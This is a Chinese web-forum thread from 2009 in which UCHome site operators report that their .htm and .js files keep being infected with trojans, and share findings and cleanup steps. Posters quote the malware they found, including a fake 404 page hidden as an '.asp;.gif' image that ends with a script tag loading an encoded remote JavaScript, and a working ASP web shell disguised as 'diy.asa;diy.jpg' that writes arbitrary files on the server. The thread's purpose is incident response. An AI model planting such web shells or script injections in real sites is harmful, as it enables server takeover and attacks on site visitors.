uchome所有的htm文件都被写入了木马,js文件也有

都快疯了，覆盖完后很快又被写入

htm文件都是在最后面写入：


.js文件都是写在文件的开头：

大家给帮忙看下。
这个东西是不是和css有关，能不能直接在后台设置成所有用户的css禁止状态
尤其是这个网站http://fd1%306.3322.org
很多人都被他们骚扰过。

另外通过ftp可以看到有这么一个图片文件
289582993.asp;.gif
很明显是个假的图片


打开其内容如下
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>无法找到该页</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=GB2312">
<STYLE type="text/css">
  BODY { font: 9pt/12pt 宋体 }
  H1 { font: 12pt/15pt 宋体 }
  H2 { font: 9pt/12pt 宋体 }
  A:link { color: red }
  A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>无法找到该页</h1>
您正在搜索的页面可能已经删除、更名或暂时不可用。
<hr>
<p>请尝试以下操作：</p>
<ul>
<li>确保浏览器的地址栏中显示的网站地址的拼写和格式正确无误。</li>
<li>如果通过单击链接而到达了该网页，请与网站管理员联系，通知他们该链接的格式不正确。
</li>
<li>单击<a href="javascript:history.back(1)">后退</a>按钮尝试另一个链接。</li>
</ul>
<h2>HTTP 错误 404 - 文件或目录未找到。<br>Internet 信息服务 (IIS)</h2>
<hr>
<p>技术信息（为技术支持人员提供）</p>
<ul>
<li>转到 <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft 产品支持服务</a>并搜索包括&ldquo;HTTP&rdquo;和&ldquo;404&rdquo;的标题。</li>
<li>打开&ldquo;IIS 帮助&rdquo;（可在 IIS 管理器 (inetmgr) 中访问），然后搜索标题为&ldquo;网站设置&rdquo;、&ldquo;常规管理任务&rdquo;和&ldquo;关于自定义错误消息&rdquo;的主题。</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

</div>
</body>
</html><script language=javascript src=http://%64%61%70%2E%78%6F%72%67%2E%70%6C/c.js?google_ad=1011x30_ad></script>
遇到同样的问题~不过我服务器上有很多网站，具体还没查出来原因，先覆盖一下源文件，然后把除了附件文件夹之外的所有文件夹有设置为只读~
待我查明原因来跟你分享~

遇到同样的问题~不过我服务器上有很多网站，具体还没查出来原因，先覆盖一下源文件，然后把除了附件文 ...
木奶姨 发表于 2009-10-12 15:24

    谢谢木奶姨。
还有谁遇到这个问题？
请各位指教一下！

用安装包里的文件覆盖掉((em:01))

临走前说一下原因吧~
我从服务器上检查最近创建的文件，和查看各日志，发现有一个伪装成.jpg格式文件的图片 diy.asa;diy.jpg出现在某个IIS网站下，实际上这个并不是一个图片，而是一个可执行文件，用文本编辑器打开后可以看到如下代码
<%on error resume next%>
<%ofso="scripting.filesystemobject"%>
<%set fso=server.createobject(ofso)%>
<%path=request("path")%>
<%if path<>"" then%>
<%data=request("dama")%>
<%set dama=fso.createtextfile(path,true)%>
<%dama.write data%>
<%if err=0 then%>
<%="Have fun!"%>
<%else%>
<%="false"%>
<%end if%>
<%err.clear%>
<%end if%>
<%dama.close%>
<%set dama=nothing%>
<%set fos=nothing%>
<%="<form action='' method=post>"%>
<%="<input type=text name=path>"%>
<%="<br>"%>
<%=server.mappath(request.servervariables("script_name"))%>
<%="<br>"%>
<%=""%>
<%="<textarea name=dama cols=50 rows=10 width=30></textarea>"%>
<%="<br>"%>
<%="<input type=submit value=Cx~>"%>

这个就是源头了~在看这个网站，是用asp做的~很长时间都没有更新过~而且当时要求我给他开了很多权限~读、写、修改、执行都开了~以至于影响到服务器上其它的网站。

这里建议各位管服务器的朋友，以后不要偷懒~偷懒的结果是给自己带来更多的麻烦~

处理方法就是楼上说的~用源文件覆盖现有的文件~保留附件的文件夹~和config文件就好了~

不排除附件文件夹下有被改掉的文件，例如每个文件夹下的index.html文件~

可以用批量文字替换工具来解决~

一会在新贴里共享个工具~

发现不能上传附件~算了，我新到这个社区~积分不楼主去搜索一下把
批量清除网页木马软件.rar

发现不能上传附件~算了，我新到这个社区~积分不楼主去搜索一下把
批量清除网页木马软件.rar
木奶姨 发表于 2009-10-12 18:24

在高级模式下可以上传附件
没有积分要求

我是租用的虚拟主机，在admin这个文件夹下竟然发现了289582993.asp;.gif这个文件。
是不是虚拟主机被感染了

在theme这个文件夹里也发现了这个289582993.asp;.gif文件